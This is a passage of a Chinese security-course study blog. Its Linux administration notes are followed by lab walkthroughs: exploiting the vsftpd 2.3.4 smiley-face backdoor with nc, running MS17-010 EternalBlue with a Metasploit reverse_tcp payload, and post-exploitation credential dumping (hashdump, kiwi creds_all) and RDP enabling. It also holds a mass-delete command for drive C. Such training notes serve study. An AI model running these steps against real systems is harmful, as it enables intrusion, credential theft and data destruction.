<span class="hljs-comment"># /etc/sudoers 添加用户才可以sudo提权</span>
root ALL=(ALL) ALL
<span class="hljs-comment"># /etc/sudoers.d/下添加也可以</span>
<span class="hljs-built_in">echo</span> <span class="hljs-string">&quot;user ALL=(ALL) ALL&quot;</span> &gt; user_sudoers


<span class="hljs-comment"># 实例</span>
<span class="hljs-built_in">echo</span> <span class="hljs-string">&#x27;while true ; do echo -e &quot;\a&quot; ; sleep 1 ; done&#x27;</span>  &gt;aa 
将脚本写入 aa 文件
./aa
<span class="hljs-built_in">chmod</span> 744 aa ======= 修改成可执行文件
./aa ======= 执行 aa文件，语法为 ./[文件名]
</code></pre>

<h3 id="top命令"><a href="#top命令" class="headerlink" title="top命令"></a>top命令</h3><pre><code class="hljs bash"><span class="hljs-comment"># top 命令的交互选项：</span>
P按键  <span class="hljs-comment">#根据CPU使用率从大到小排序</span>
M按键  <span class="hljs-comment">#根据内存使用率从大到小排序</span>
N按键  <span class="hljs-comment">#根据PIN从大到小排序</span>
T按键  <span class="hljs-comment">#根据进程使用CPU累计运算的时间排序</span>
q按键  <span class="hljs-comment">#退出top </span>

ps aux  <span class="hljs-comment"># 显示用户，tty，命令</span>
ps -ef <span class="hljs-comment"># pid</span>
top <span class="hljs-comment"># 动态查看，3s查看一次</span>
</code></pre>

<h3 id="cisp-practise04"><a href="#cisp-practise04" class="headerlink" title="cisp-practise04"></a><a href="https://hjxstart.github.io/2025/08/26/cisp-practice04/">cisp-practise04</a></h3><h2 id="第五天-Kali-网络-rpm包管理工具"><a href="#第五天-Kali-网络-rpm包管理工具" class="headerlink" title="第五天 Kali 网络&amp;rpm包管理工具"></a>第五天 Kali 网络&amp;rpm包管理工具</h2><h3 id="安装和配置Kali"><a href="#安装和配置Kali" class="headerlink" title="安装和配置Kali"></a>安装和配置Kali</h3><pre><code class="hljs bash">wget -qO- https://archive.kali.org/archive-key.asc | <span class="hljs-built_in">sudo</span> gpg --dearmor -o /usr/share/keyrings/kali-archive-keyring.gpg
<span class="hljs-built_in">echo</span> <span class="hljs-string">&quot;deb [signed-by=/usr/share/keyrings/kali-archive-keyring.gpg] https://archive.kali.org/kali kali-rolling main non-free contrib&quot;</span> | <span class="hljs-built_in">sudo</span> <span class="hljs-built_in">tee</span> /etc/apt/sources.list
</code></pre>

<h3 id="网络配置"><a href="#网络配置" class="headerlink" title="网络配置"></a>网络配置</h3><pre><code class="hljs bash"><span class="hljs-comment"># ifconfig</span>
ifconfig -s <span class="hljs-comment"># 查询网卡网络通信情况</span>
ifconfig ens33 down <span class="hljs-comment"># 关闭网卡，网卡不在，IP也不见了</span>
ifconfig ens33 up <span class="hljs-comment"># 开启网卡</span>
ifdown ens33 <span class="hljs-comment"># 关闭网卡，网卡还在，IP不见了</span>
ifup ens33 <span class="hljs-comment"># 启动网卡</span>

<span class="hljs-comment"># ip</span>
ip addr <span class="hljs-comment"># 查看IP地址</span>
ip addr add 192.168.16.101/24 dev ens33 <span class="hljs-comment"># 临时添加IP地址，用于测试，重启就没有了</span>
ip <span class="hljs-built_in">link</span> <span class="hljs-comment"># 查看当前设备情况</span>
ip <span class="hljs-built_in">link</span> <span class="hljs-built_in">set</span> ens33 down <span class="hljs-comment"># 关闭网卡，网卡不在，</span>
ip <span class="hljs-built_in">link</span> <span class="hljs-built_in">set</span> ens33 up <span class="hljs-comment"># 开启网卡</span>
ip <span class="hljs-built_in">link</span> <span class="hljs-built_in">set</span> ens33 name ens32 <span class="hljs-comment"># 关闭网卡后，可以修改网卡名称，之后再启动</span>
ip route show <span class="hljs-comment"># 查看路由信息</span>

<span class="hljs-comment"># route</span>
route <span class="hljs-comment"># 显示路由 (default)</span>
route -n <span class="hljs-comment"># -n是以数字的方式显示 (0.0.0.0)</span>

<span class="hljs-comment"># netstat 查看网络连接</span>
netstat -anpt <span class="hljs-comment"># 显示当前主机所有互动的,TCP协议</span>
netstat -anpu <span class="hljs-comment"># 显示 UDP协议</span>
netstat -lanpt <span class="hljs-comment"># 监听</span>

<span class="hljs-comment"># ss 查看网络连接2，高并发的场景</span>
ss -anpt <span class="hljs-comment"># 和netstat差不多</span>

<span class="hljs-comment"># nslookup # </span>
nslookup www.baidu.com <span class="hljs-comment"># 返回域名对应的IP地址</span>

<span class="hljs-comment"># ping</span>
ping -c 5 www.baidu.comn <span class="hljs-comment"># 指定ping 次数</span>
ping -s 1000 www.baidu.com <span class="hljs-comment"># 指定包大小</span>

<span class="hljs-comment"># tracert # 跟踪</span>
yum install -y traceroute
traceroute www.wangdun.cn

<span class="hljs-comment"># 网卡配置目录</span>
/etc/sysconfig/network-scripts/
<span class="hljs-built_in">cp</span> ifcfg-ens33 ifcfg-ens33.bak <span class="hljs-comment"># 备份网卡</span>
<span class="hljs-comment"># vim ifcfg-ens33</span>
TYPE=<span class="hljs-string">&quot;Ethernet&quot;</span> <span class="hljs-comment"># 以太网</span>
PROXY_METHOD=<span class="hljs-string">&quot;none&quot;</span> <span class="hljs-comment"># 代理方法：关闭</span>
BROWSER_ONLY=<span class="hljs-string">&quot;no&quot;</span> <span class="hljs-comment"># 仅仅是浏览器</span>
BOOTPROTO=<span class="hljs-string">&quot;dhcp&quot;</span> <span class="hljs-comment"># 网卡协议</span>
DEFROUTE=<span class="hljs-string">&quot;yes&quot;</span> <span class="hljs-comment"># 默认路由</span>
IPV4_FAILURE_FATAL=<span class="hljs-string">&quot;no&quot;</span> <span class="hljs-comment"># </span>
IPV6INIT=<span class="hljs-string">&quot;yes&quot;</span>
IPV6_AUTOCONF=<span class="hljs-string">&quot;yes&quot;</span>
IPV6_DEFROUTE=<span class="hljs-string">&quot;yes&quot;</span>
IPV6_FAILURE_FATAL=<span class="hljs-string">&quot;no&quot;</span>
IPV6_ADDR_GEN_MODE=<span class="hljs-string">&quot;stable-privacy&quot;</span>
NAME=<span class="hljs-string">&quot;ens33&quot;</span> <span class="hljs-comment"># 网卡名称</span>
UUID=<span class="hljs-string">&quot;5b505e8a-35f2-4920-8241-edd9f3070780&quot;</span> <span class="hljs-comment"># 唯一标识码</span>
DEVICE=<span class="hljs-string">&quot;ens33&quot;</span> <span class="hljs-comment"># 设备名称</span>
ONBOOT=<span class="hljs-string">&quot;yes&quot;</span> <span class="hljs-comment"># 是否激活</span>
<span class="hljs-comment"># 静态新加（DNS最多3个）</span>
IPADDR=<span class="hljs-string">&quot;192.168.16.101&quot;</span>
NETMASK=<span class="hljs-string">&quot;255.255.255.0&quot;</span>
GATEWAY=<span class="hljs-string">&quot;192.168.16.2&quot;</span>
DNS1=<span class="hljs-string">&quot;223.5.5.5&quot;</span> <span class="hljs-comment"># 阿里</span>
DNS2=<span class="hljs-string">&quot;8.8.8.8&quot;</span> <span class="hljs-comment"># 谷歌</span>
DNS3=<span class="hljs-string">&quot;192.168.16.2&quot;</span>

<span class="hljs-comment"># cat /etc/resolv.conf</span>
<span class="hljs-comment"># Generated by NetworkManager</span>
nameserver 223.5.5.5
nameserver 8.8.8.8
nameserver 192.168.16.2

<span class="hljs-comment"># df</span>
<span class="hljs-built_in">df</span> -h <span class="hljs-comment"># 查看系统空间</span>
free -h <span class="hljs-comment"># 内存空闲</span>
<span class="hljs-built_in">cat</span> /proc/cpuinfo <span class="hljs-comment"># 查看CPU信息</span>


<span class="hljs-comment"># rpm</span>
<span class="hljs-comment"># http://rpmfind.net/</span>
rpm -aq <span class="hljs-comment"># 查询系统已安装的包</span>
rpm -ivh <span class="hljs-comment"># i:安装；v：可视化；h:进度</span>
rpm -ql <span class="hljs-comment"># 查看软件是否安装</span>
-i <span class="hljs-comment"># 安装</span>
-e <span class="hljs-comment"># 卸载</span>

<span class="hljs-comment"># yum</span>
yum repolist <span class="hljs-comment"># 查看镜像源</span>
yum search vsftpd <span class="hljs-comment"># 查看vsftpd软件包</span>
yum install vsftpd <span class="hljs-comment"># 安装vsftpd软件</span>
yum remove vsftpd <span class="hljs-comment"># 卸载vsftpd软件</span>
yum autoremove <span class="hljs-comment"># 卸载残留</span>
yum clear all



<span class="hljs-comment">## vsftpd</span>
<span class="hljs-comment"># http://rpmfind.net/</span>
wget https://rpmfind.net/linux/mageia/distrib/8/x86_64/media/core/release/vsftpd-3.0.3-11.mga8.x86_64.rpm
<span class="hljs-comment"># /etc/vsftpd/vsftpd.conf</span>
anonymous_enable=NO
chroot_local_user=YES
chroot_list_enable=YES
chroot_list_file=/etc/vsftpd/chroot_list
listen=YES
listen_ipv6=NO
<span class="hljs-comment"># </span>
useradd ftpuser
passwd ftpuser
vim  /etc/vsftpd/user_list <span class="hljs-comment"># 添加ftpuser</span>
<span class="hljs-comment"># systemctl restart vsftpd</span>
netstat -anpt  <span class="hljs-comment"># 查看21端口</span>

<span class="hljs-comment"># 客户端</span>
yum install ftp
sftp ftpuser@192.168.16.101
get filename <span class="hljs-comment"># 下载</span>
put filename <span class="hljs-comment"># 上传</span>
</code></pre>

<h3 id="笑脸漏洞，2-3及以下版本"><a href="#笑脸漏洞，2-3及以下版本" class="headerlink" title="笑脸漏洞，2.3及以下版本"></a>笑脸漏洞，2.3及以下版本</h3><pre><code class="hljs bash"><span class="hljs-comment"># 探活</span>
nmap 192.168.16.0/24 <span class="hljs-comment"># 可以查看到ftp</span>
nmap -sV 192.168.16.ip <span class="hljs-comment"># 查看服务版本</span>

<span class="hljs-comment"># nc 瑞士小军刀</span>
nc 192.168.16.ip 21 <span class="hljs-comment"># ftp21端口,用户和密码随便输入, :)是关键</span>
	user aa:) 
	pass aaaa
	
<span class="hljs-comment"># 同时开其他终端</span>
<span class="hljs-built_in">sudo</span> nmap -sS -p 6200 192.168.16.ip <span class="hljs-comment"># 6200端口</span>
nc 192.168.16.ip 6200 <span class="hljs-comment">#已经进去了</span>
	<span class="hljs-built_in">ls</span>
	python -c <span class="hljs-string">&#x27;import pty;pty.spawn(&quot;/bin/bash&quot;)&#x27;</span>


&lt;img src=<span class="hljs-string">&quot;http://img.k2r2.com/uploads/002/20230625/1618252013.jpg&quot;</span>&gt;
</code></pre>

<hr>
<h1 id="其他"><a href="#其他" class="headerlink" title="其他"></a>其他</h1><h3 id="Win7"><a href="#Win7" class="headerlink" title="Win7"></a>Win7</h3><pre><code class="hljs bash"><span class="hljs-comment"># 删除C盘的全部文件</span>
del *.* /s/q
</code></pre>

<h3 id="Kali"><a href="#Kali" class="headerlink" title="Kali"></a>Kali</h3><pre><code class="hljs bash"><span class="hljs-comment"># 设置中文</span>
<span class="hljs-built_in">sudo</span> dpkg-reconfigure locales

<span class="hljs-comment"># 修改root密码</span>
<span class="hljs-built_in">sudo</span> -i
password root

<span class="hljs-comment">## root用户视图下，更换kali源仓库为国内</span>
<span class="hljs-built_in">cd</span> /etc/apt
<span class="hljs-built_in">cp</span> sources.list sources.list.bak
<span class="hljs-comment"># 阿里源</span>
deb https://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src https://mirrors.aliyun.com/kali kali-rolling main non-free contrib
<span class="hljs-comment"># apt更新</span>
apt update <span class="hljs-comment"># 没有公钥解决方法：sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys ED65462EC8D5E4C5</span>

<span class="hljs-comment">## 实用工具</span>
<span class="hljs-comment"># 检测主机是否存在</span>
fping -asg 192.168.112.0/24 -C 1

<span class="hljs-comment">## nmap  网络探测和安全审核</span>
<span class="hljs-comment"># nmap 192.168.112.128</span>
135/tcp   open  msrpc <span class="hljs-comment"># RPC远程调用</span>
139/tcp   open  netbios-ssn <span class="hljs-comment"># 文件共享</span>
445/tcp   open  microsoft-ds <span class="hljs-comment"># 永恒之蓝</span>
3389/tcp  open  ms-wbt-server <span class="hljs-comment"># 远程桌面端口</span>
5357/tcp  open  wsdapi <span class="hljs-comment"># 非常高危的端口</span>
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown
<span class="hljs-comment"># nmap -sV 192.168.112.128</span>

<span class="hljs-comment"># nmap -p 1-65535 192.168.112.128</span>

<span class="hljs-comment"># nmap -p- 192.168.112.128</span>
</code></pre>

<h3 id="永恒之蓝-MS17-010"><a href="#永恒之蓝-MS17-010" class="headerlink" title="永恒之蓝 MS17-010"></a>永恒之蓝 MS17-010</h3><pre><code class="hljs bash"><span class="hljs-built_in">sudo</span> nmap -sS -p 445 192.168.112.0/24 &gt; p_445

<span class="hljs-built_in">cat</span> p_445 | grep -E <span class="hljs-string">&quot;Nmap|open&quot;</span>

<span class="hljs-comment"># </span>
msfconsole
  search ms17_010
  use auxiliary/scanner/smb/smb_ms17_010
  use exploit/windows/smb/ms17_010_eternalblue\
    <span class="hljs-built_in">set</span> rhost 192.168.112.128 <span class="hljs-comment"># 设置靶机</span>
    <span class="hljs-built_in">set</span> lhost 192.168.112.130 <span class="hljs-comment"># 设置本机IP</span>
    <span class="hljs-built_in">set</span> payload windows/x64/meterpreter/reverse_tcp
    run <span class="hljs-comment"># 开始攻击</span>

<span class="hljs-comment">## 攻击成功后的操作</span>
screenshot <span class="hljs-comment"># 截图</span>
screenshare <span class="hljs-comment"># 实时监控屏幕</span>
<span class="hljs-comment"># 查看密码</span>
hashdump
load kiwi
ps -S <span class="hljs-string">&quot;csrss&quot;</span>
migrate 344
creds_all
shell <span class="hljs-comment"># 登陆到win7</span>
chcp 65001 <span class="hljs-comment"># 消除乱码</span>
wmic RDTOGGLE WHERE ServerName=<span class="hljs-string">&#x27;%COMPUTERNAME%&#x27;</span> call SetAllowTSConnections 1 <span class="hljs-comment"># 远程</span>
netstat -an <span class="hljs-comment"># 查看端口</span>
<span class="hljs-built_in">sudo</span> rdesktop 192.168.112.128 <span class="hljs-comment"># 发起远程</span>
</code></pre>

<h3 id="SQL注入–CVE-2022-32991漏洞复现"><a href="#SQL注入–CVE-2022-32991漏洞复现" class="headerlink" title="SQL注入–CVE-2022-32991漏洞复现"></a>SQL注入–CVE-2022-32991漏洞复现</h3><pre><code class="hljs bash"></code></pre>


      
       <hr><span style="font-style: italic;color: gray;"> 转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达。可以邮件至 hjxstart@126.com </span>
    </div>
</article>








    




    </div>
    <div class="copyright">
        <p class="footer-entry"><span class="miit">
                <img src="/img/gov.png" title="中华人民共和国工业和信息化部">
                <a target="_blank" rel="noopener" href="http://beian.miit.gov.cn/">粤ICP备2021170625号-1</a>
        </span>
    
    ©2019-2022 hjxstart
</p>
<p class="footer-entry">Built with <a href="https://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/yelog/hexo-theme-3-hexo" target="_blank">3-hexo</a> theme</p>

    </div>
    <div class="full-toc">
        <button class="full" data-title="切换全屏 快捷键 s"><span class="min "></span></button>
<a class="" id="rocket" ></a>

    </div>
</div>

</body>
<script src="/js/jquery.pjax.js?v=1.1.0" ></script>

<script src="/js/script.js?v=1.1.0" ></script>
<script>
    var img_resize = 'default';
    function initArticle() {
        /*渲染对应的表格样式*/
        
            $("#post .pjax table").addClass("green_title");
        

        /*渲染打赏样式*/
        

        /*高亮代码块行号*/
        

        /*访问数量*/
        
        $.getScript("//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js");
        

        /*代码高亮，行号对齐*/
        $('.pre-numbering').css('line-height',$('.has-numbering').css('line-height'));

        
        
    }

    /*打赏页面隐藏与展示*/
    

</script>

<!--加入行号的高亮代码块样式-->

<!--自定义样式设置-->
<style>
    
    
    .nav {
        width: 542px;
    }
    .nav.fullscreen {
        margin-left: -542px;
    }
    .nav-left {
        width: 120px;
    }
    
    
    @media screen and (max-width: 1468px) {
        .nav {
            width: 492px;
        }
        .nav.fullscreen {
            margin-left: -492px;
        }
        .nav-left {
            width: 100px;
        }
    }
    
    
    @media screen and (max-width: 1024px) {
        .nav {
            width: 492px;
            margin-left: -492px
        }
        .nav.fullscreen {
            margin-left: 0;
        }
    }
    
    @media screen and (max-width: 426px) {
        .nav {
            width: 100%;
        }
        .nav-left {
            width: 100%;
        }
    }
    
    
    .nav-right .title-list nav a .post-title, .nav-right .title-list #local-search-result a .post-title {
        color: #383636;
    }
    
    
    .nav-right .title-list nav a .post-date, .nav-right .title-list #local-search-result a .post-date {
        color: #5e5e5f;
    }
    
    
    .nav-right nav a.hover, #local-search-result a.hover{
        background-color: #e2e0e0;
    }
    
    

    /*列表样式*/
    

    /* 背景图样式 */
    
    


    /*引用块样式*/
    

    /*文章列表背景图*/
    
    .nav-right:before {
        content: ' ';
        display: block;
        position: absolute;
        left: 0;
        top: 0;
        width: 100%;
        height: 100%;
        opacity: 0.3;
        background: url("/img/article-list-bg-img.png");
        background-repeat: no-repeat;
        background-position: 50% 0;
        -ms-background-size: cover;
        -o-background-size: cover;
        -moz-background-size: cover;
        -webkit-background-size: cover;
        background-size: cover;
    }
    

    
</style>







</html>
